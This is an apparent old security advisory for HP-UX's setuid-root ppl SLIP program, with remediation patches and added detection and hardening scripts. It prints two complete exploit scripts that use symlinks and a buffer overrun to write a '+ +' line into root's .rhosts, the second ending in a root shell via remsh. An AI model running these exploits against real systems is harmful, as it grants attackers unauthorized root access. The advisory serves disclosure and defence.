COMMAND

    /usr/bin/ppl (/bin/ppl)

SYSTEMS AFFECTED

    HP 9000 Series 700/800s running HP-UX releases 9.X & 10.X

PROBLEM

    The ppl application is HP's SLIP (Serial Line IP) implementation,
    a point-to-point serial link for TCP/IP.  It is installed setuid
    root, and the string given with its -o option ends up in files
    that ppl writes with root privileges, with no check for symbolic
    links on the way.  Each of the two scripts below uses this to get
    a line containing "+ +" (any host, any user) into root's .rhosts
    file: the first by linking ppl's log file to /.rhosts before ppl
    writes the -o string to it, the second by overrunning a buffer
    with the -o argument so that ppl dumps core into a "core" file
    that is a symbolic link to ~root/.rhosts.


	#!/bin/ksh

	# ppl exploit, first part: ppl (setuid root) writes the -o string
	# to its log file, so point the log at /.rhosts before it does.
	# 9.X keeps the log in /usr/spool/ppl/log, 10.X in /var/ppl/log.

	VER=`uname -r | cut -f2 -d.`
	if [ "${VER}" = "10" ]
	then
		LOG=/var/ppl/log
	else
		LOG=/usr/spool/ppl/log
	fi

	mv $LOG $LOG.old		# keep the real log aside
	ln -s /.rhosts $LOG		# ppl now writes to /.rhosts as root
	ppl -o '\
	+ +
	'				# the logged string carries a "+ +" line
	rm $LOG				# drop the link and restore the log
	mv $LOG.old $LOG

    or

	#!/bin/ksh

	# ppl exploit, second part - SOD 15Oct96
	# not all buffer overruns need to force an address into the PC
	# works on 10.X, too, oddly enough. - Script Junkie
	#
	# An over-long -o argument overruns a buffer and ppl, running as
	# root, dumps core into ./core.  With ./core a symlink to root's
	# .rhosts, the core image, "+ +" line included, becomes root's
	# .rhosts.

	#HOST='localhost'
	#USER=`whoami`

	HOST="+"
	USER="+"

	cd /tmp
	rm core 2> /dev/null
	ln -s ~root/.rhosts core	# the core dump lands in ~root/.rhosts
	AAA='aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
	aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa'
	STUFF=`echo "${AAA}\n${HOST} ${USER}"`	# filler, newline, then "+ +"
	ppl -o "${STUFF}"		# overrun -> core dump written as root
	rm core				# drop the link; the target keeps the data
	remsh localhost -l root sh -i	# "+ +" now trusts any host and user
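
    Traces the two scripts leave behind can be checked for with the
    following added shell script; it is not part of the original
    advisory.  It looks for the symbolic links the scripts plant
    (/.rhosts, /tmp/core and the two log paths), for "+" wildcard
    entries in /.rhosts, and for an .rhosts that is a binary core
    image rather than text.  The .rhosts contents used to exercise
    it are constructed, and readlink is assumed to be available.

```sh
#!/bin/sh
# Added example, not part of the advisory: look for traces of the two
# ppl exploits.  Takes an optional root prefix so it can be pointed at
# a mounted image or a test directory (default "/").

# Print rhosts lines whose host or user field is the "+" wildcard.
# Exit status 0 when at least one such line exists.
rhosts_wildcards() {
    awk '$1 == "+" || $2 == "+" { print; found = 1 }
         END { exit found ? 0 : 1 }' "$1"
}

# Exit status 0 when the file contains NUL bytes, i.e. it is a core
# image (or similar binary) rather than the plain text .rhosts expects.
is_binary_file() {
    total=$(wc -c < "$1")
    without_nul=$(tr -d '\000' < "$1" | wc -c)
    [ $((total)) -ne $((without_nul)) ]
}

# Exit status 0 (suspicious) when the path is a symbolic link, as left
# behind by an interrupted run of either script; prints its target.
is_planted_symlink() {
    [ -L "$1" ] || return 1
    printf '%s -> %s\n' "$1" "$(readlink "$1")"   # readlink: assumed present
}

# Run all checks under a root prefix.  Exit status 1 means something
# was found; the findings are printed.
audit() {
    root=${1%/}
    rc=0
    for f in "$root/.rhosts" "$root/tmp/core" \
             "$root/usr/spool/ppl/log" "$root/var/ppl/log"; do
        is_planted_symlink "$f" && rc=1
    done
    if [ -f "$root/.rhosts" ]; then
        if is_binary_file "$root/.rhosts"; then
            echo "$root/.rhosts is not plain text (core image?)"
            rc=1
        elif rhosts_wildcards "$root/.rhosts"; then
            echo "$root/.rhosts grants wildcard access (lines above)"
            rc=1
        fi
    fi
    return $rc
}

audit "${ROOT:-/}" && echo "no traces of the ppl exploits found"
```

    Run it as root on the suspect host, or with ROOT set to the mount
    point of an image taken from it.  A "+ +" line is reported even
    when .rhosts is otherwise legitimate, so review the printed lines
    rather than acting on the exit status alone.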

SOLUTION

    To protect a system that cannot be patched, change /usr/bin/ppl to
    owner only access and clear its suid bit.  The ppl program will not
    run unless it has root privileges, so normal users will no longer be
    able to use it.  This will be a problem for normal users who rely on
    SLIP to reach the machine; if ppl is needed for normal operations,
    sites without the patch will have to evaluate the risk case by case.
    The vulnerability can be eliminated from HP-UX releases 9.X and 10.X
    by applying the appropriate patch.  Apply patch:

        PHNE_9378 for all platforms with HP-UX releases 9.X
        PHNE_9375 for all platforms with HP-UX releases 10.00/10.01
        PHNE_9376 for all platforms with HP-UX releases 10.10
        PHNE_9771 for all platforms with HP-UX releases 10.20
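
    The workaround above can be checked and applied with the following
    added shell script (it is not HP's and not part of the advisory).
    It reports whether ppl still carries the setuid bit and, given the
    argument harden, applies owner-only access with the bit cleared;
    PPL can be pointed at a copy of the file to try it out first.  The
    patches remain the real fix.

```sh
#!/bin/sh
# Added example, not HP's: check for the vulnerable setuid ppl and
# optionally apply the advisory's workaround.  PPL may be overridden
# to test on a copy of the binary.
PPL=${PPL:-/usr/bin/ppl}

# First ten characters of ls -l: the symbolic mode, e.g. -r-sr-xr-x.
mode_of() { ls -ld "$1" | cut -c1-10; }

# Exit status 0 when the file carries the setuid bit.
is_setuid() { [ -u "$1" ]; }

# Advisory workaround: setuid cleared, owner rwx, nothing for group or
# other.  This also locks out non-root users who legitimately used SLIP.
harden() {
    is_setuid "$1" || echo "note: $1 was not setuid" >&2
    chmod u-s,u+rwx,go-rwx "$1" || return 1
    [ "$(mode_of "$1")" = "-rwx------" ]
}

# Report only.  Exit status 1 means the vulnerable configuration is
# present; a missing binary counts as not vulnerable.
check() {
    if [ ! -e "$1" ]; then
        echo "$1: not installed"
        return 0
    fi
    if is_setuid "$1"; then
        echo "$1 is setuid ($(mode_of "$1")): vulnerable unless patched"
        return 1
    fi
    echo "$1 is not setuid ($(mode_of "$1"))"
}

case "${1:-check}" in
    check)  check "$PPL" ;;
    harden) harden "$PPL" && check "$PPL" ;;
    *)      echo "usage: $0 [check|harden]" >&2 ;;
esac
```

    The harden step has to run as root on the real binary; once the
    vendor patch is installed, re-run check so the patched ppl's own
    permissions are what you expect rather than the workaround's.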